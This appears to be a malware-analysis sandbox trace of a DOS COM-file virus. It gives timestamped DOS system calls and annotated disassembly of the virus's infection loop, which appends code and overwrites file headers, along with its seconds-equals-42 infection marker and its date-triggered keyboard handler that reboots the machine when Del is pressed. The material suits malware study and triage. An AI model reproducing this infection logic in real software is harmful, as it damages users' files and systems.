2018-12-25T12:56:22.754166927Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.758724646Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.760024158Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.765752546Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.773154891Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.775652146Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.783276077Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.78796468Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.792433429Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.794242389Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.796437228Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.798827206Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.800634188Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.802857236Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.804094592Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.809799044Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.82225708Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.825429813Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.836545411Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.845069707Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.852332853Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.854203521Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.858225924Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.862838316Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.864637564Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.868169475Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.87011948Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.879307692Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.891565992Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.894311064Z 42 PC: 12b82 | Get date
0x12b82: cmp dl, 1
; Disassembly window the sandbox printed for the "Get date" event (PC 12b82).
; The window's first instruction, 0x12b82: cmp dl, 1, precedes this block. DOS Get date
; returns the day of the month in DL, so the branch below is taken only on the 1st.
; The config record printed before this run has "Day":1, and the trace continues with
; "Display string" at PC 12b8e, i.e. the je path.
; The trace's "AKA 'Display string'" / "AKA 'Random read'" labels are the DOS function
; names for 09h / 21h; as interrupt numbers, 9 is the keyboard hardware interrupt and
; 33 (21h) is the DOS services interrupt.
0x12b85: je 0x12b8a                         ; day == 1 -> date-triggered path
0x12b87: jmp 0x12bf0                        ; any other day: continue at 0x12bf0 (outside this window)
0x12b89: nop                                ; padding
0x12b8a: mov ah, 9                          ; AH=09h display '$'-terminated string at DS:DX (DX is set before this window)
0x12b8c: int 0x21                           ; trace: "Display string" at PC 12b8e
0x12b8e: jmp 0x12bbd                        ; continues outside this window; the trace then shows get/set of interrupt vector 9
0x12b90: nop                                ; padding
; 0x12b91-0x12ba5 is not reached by fall-through (a jmp precedes it). It reads the keyboard
; port, so it is presumably the handler installed by the "Set interrupt vector 9" event —
; TODO confirm against the vector value, which the trace does not print.
0x12b91: push ax                            ; preserve AX for the interrupted code
0x12b92: in al, 0x60                        ; read the keyboard controller data port (scancode)
0x12b94: cmp al, 0x53                       ; 0x53 = Del key make code (scancode set 1)
0x12b96: nop
0x12b97: nop
0x12b98: je 0x12ba0                         ; Del pressed -> reset path
0x12b9a: pop ax                             ; otherwise restore AX
0x12b9b: ljmp ptr cs:[0x29f]                ; far jump through the pointer stored at cs:0x29f — presumably the saved original handler (chaining)
0x12ba0: ljmp 0xffff:0                      ; FFFF:0000 is the x86 reset entry point: the machine restarts (AX is left on the stack)
0x12ba5: iret                               ; no visible branch targets this address
0x12ba6: cmp ax, 0x4b00                     ; AX=4B00h is DOS load-and-execute; looks like the start of an INT 21h filter — the trace shows vector 33 only being read, not set
0x12ba9: jne 0x12baf                        ; target is outside this window
2018-12-25T12:56:22.896694876Z 9 PC: 12b8e | Display string (String= '�5Goat file (COM). Size=00000064h/0000000100d bytes. ')
2018-12-25T12:56:22.903416131Z 53 PC: 12bc2 | Get interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:56:22.905737268Z 37 PC: 12bd4 | Set interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:56:22.907210381Z 53 PC: 12bd9 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:56:22.909888882Z 49 PC: 12bf0 | Terminate and stay resident (Return code = '0' | Memory size = '31')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17691,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:56:22.64590608Z 26 PC: 12ae4 | Set disk transfer address
2018-12-25T12:56:22.647265564Z 78 PC: 12aef | Find first file
2018-12-25T12:56:22.65393062Z 67 PC: 12b10 | Get or set file attributes
2018-12-25T12:56:22.671603645Z 61 PC: 12b19 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:56:22.682890581Z 63 PC: 12b25 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:56:22.689505271Z 66 PC: 12b2d | Move file pointer
2018-12-25T12:56:22.690939687Z 44 PC: 12b3c | Get time
0x12b3c: mov word ptr [bp + 0x11e], dx
; Disassembly window the sandbox printed for the "Get time" event (PC 12b3c) of this run.
; The window's first instruction, 0x12b3c: mov word ptr [bp + 0x11e], dx, precedes this block.
; Trace PCs are the addresses right after each `int 0x21` below (12b4b, 12b56, 12b69, 12b6d).
; BX is never loaded in this window; the trace reports handle 5 for the file calls.
0x12b40: call 0x22aad                       ; target is outside this window; the trace logs a 412-byte write at PC 12abb before 12b4b — presumably made inside this call
0x12b43: cdq                                ; NOTE(review): printed as cdq; in 16-bit code this opcode is CWD (DX = sign of AX) — confirm decoder mode
0x12b44: sub cx, cx                         ; CX = 0 (high word of the seek offset)
0x12b46: mov ax, 0x4200                     ; AH=42h move file pointer, AL=00h = offset CX:DX counted from start of file
0x12b49: int 0x21                           ; trace: "Move file pointer"; offset is 0 if DX ended up 0 above (AX is not visible here)
0x12b4b: lea dx, word ptr [bp + 0x29c]      ; DS:DX = 3-byte buffer at bp+0x29c (contents not shown)
0x12b4f: mov cx, 3                          ; byte count
0x12b52: mov ah, 0x40                       ; AH=40h write to handle
0x12b54: int 0x21                           ; trace: "Write 3 bytes on handle 5"; pairs with the earlier 3-byte read, so presumably the file's first three bytes are replaced
; bp+0x2bd / bp+0x2bf / bp+0x2c5 are spaced like time (+16h), date (+18h) and name (+1Eh)
; in a DOS find-file DTA record — DTA base is not shown here, TODO confirm.
0x12b56: mov dx, word ptr [bp + 0x2bf]      ; DX = date word for the call below
0x12b5a: mov cx, word ptr [bp + 0x2bd]      ; CX = time word for the call below
0x12b5e: and cl, 0xe0                       ; clear bits 0-4 of the time word (the 2-second field)
0x12b61: or cl, 0x15                        ; force that field to 0x15 = 21, i.e. a seconds value of 42
0x12b64: mov ax, 0x5701                     ; AH=57h, AL=01h = set file date and time
0x12b67: int 0x21                           ; every file written by this path gets seconds = 42; presumably an "already processed" marker (the check is not in this window), usable as a triage indicator
0x12b69: mov ah, 0x3e                       ; AH=3Eh close handle
0x12b6b: int 0x21                           ; trace: "Close file"
0x12b6d: lea dx, word ptr [bp + 0x2c5]      ; DS:DX = bp+0x2c5, presumably the file name (see DTA note above)
0x12b71: sub cx, cx                         ; CX = 0; window ends here — the next trace event is "Get or set file attributes" at PC 12b7c
2018-12-25T12:56:22.693369902Z 64 PC: 12abb | Write file or device (Write 412 bytes on handle 5)
2018-12-25T12:56:22.702473849Z 66 PC: 12b4b | Move file pointer
2018-12-25T12:56:22.703791236Z 64 PC: 12b56 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:56:22.710294702Z 87 PC: 12b69 | Get or set file date and time
2018-12-25T12:56:22.712192367Z 62 PC: 12b6d | Close file
2018-12-25T12:56:22.72022084Z 67 PC: 12b7c | Get or set file attributes
2018-12-25T12:56:22.729709212Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.732975848Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.742743984Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.749187185Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.756038805Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.757752383Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.760015822Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.76465836Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.765941328Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.768447448Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.770527813Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.777692135Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.787357312Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.790555285Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.80001879Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.806442657Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.813244176Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.814580181Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.816838864Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.820870744Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.822660996Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.825167046Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.827372409Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.832494314Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.842620725Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.845763449Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.855285639Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.861824087Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.868364281Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.870424231Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.872619878Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.87621712Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.877404674Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.879903427Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.88146104Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.889358557Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.901701622Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.904461556Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.915509117Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.921989291Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.928209099Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.931283114Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.933529347Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.936237481Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.938180353Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.940641803Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.942048247Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.949444391Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.959387056Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.961880134Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.972752908Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.979219503Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.985699146Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.987968476Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.990320442Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.998431066Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:23.000609846Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:23.006950609Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:23.008227979Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:23.016301413Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:23.026622286Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:23.030250274Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:23.040366308Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:23.046722759Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:23.052780629Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:23.055291637Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:23.057957943Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:23.060844953Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:23.063404626Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:23.065937304Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:23.067373439Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:23.075199274Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:23.08467543Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:23.087056728Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:23.097263578Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:23.101860408Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:23.108349515Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:23.110334835Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:23.112522932Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:23.1162415Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:23.117845323Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:23.120443104Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:23.121757853Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:23.12990003Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:23.140037439Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:23.142302431Z 42 PC: 12b82 | Get date
0x12b82: cmp dl, 1
; Disassembly window the sandbox printed for the "Get date" event (PC 12b82) of this run.
; The window's first instruction, 0x12b82: cmp dl, 1, precedes this block. DOS Get date
; returns the day of the month in DL, so the branch below is taken only on the 1st.
; The config record printed before this run has "Day":2, and the trace continues with
; "Set disk transfer address" at PC 12bfa — consistent with the jmp 0x12bf0 path. No
; interrupt-vector events and no stay-resident call appear in this run.
0x12b85: je 0x12b8a                         ; day == 1 -> date-triggered path
0x12b87: jmp 0x12bf0                        ; any other day: continue at 0x12bf0 (outside this window)
0x12b89: nop                                ; padding
0x12b8a: mov ah, 9                          ; AH=09h display '$'-terminated string at DS:DX (DX is set before this window)
0x12b8c: int 0x21
0x12b8e: jmp 0x12bbd                        ; continues outside this window
0x12b90: nop                                ; padding
; 0x12b91-0x12ba5 is not reached by fall-through (a jmp precedes it). It reads the keyboard
; port, so it is presumably a keyboard-interrupt (INT 9) handler — TODO confirm; nothing in
; this run's trace installs it.
0x12b91: push ax                            ; preserve AX for the interrupted code
0x12b92: in al, 0x60                        ; read the keyboard controller data port (scancode)
0x12b94: cmp al, 0x53                       ; 0x53 = Del key make code (scancode set 1)
0x12b96: nop
0x12b97: nop
0x12b98: je 0x12ba0                         ; Del pressed -> reset path
0x12b9a: pop ax                             ; otherwise restore AX
0x12b9b: ljmp ptr cs:[0x29f]                ; far jump through the pointer stored at cs:0x29f — presumably the saved original handler (chaining)
0x12ba0: ljmp 0xffff:0                      ; FFFF:0000 is the x86 reset entry point: the machine restarts (AX is left on the stack)
0x12ba5: iret                               ; no visible branch targets this address
0x12ba6: cmp ax, 0x4b00                     ; AX=4B00h is DOS load-and-execute; looks like the start of an INT 21h filter — TODO confirm, the code that would install it is not shown
0x12ba9: jne 0x12baf                        ; target is outside this window
2018-12-25T12:56:23.145341036Z 26 PC: 12bfa | Set disk transfer address
2018-12-25T12:56:23.146272529Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=00000064h/0000000100d bytes. ')
2018-12-25T12:56:23.151376349Z 76 PC: 12a86 | Terminate with return code (Return code = '36')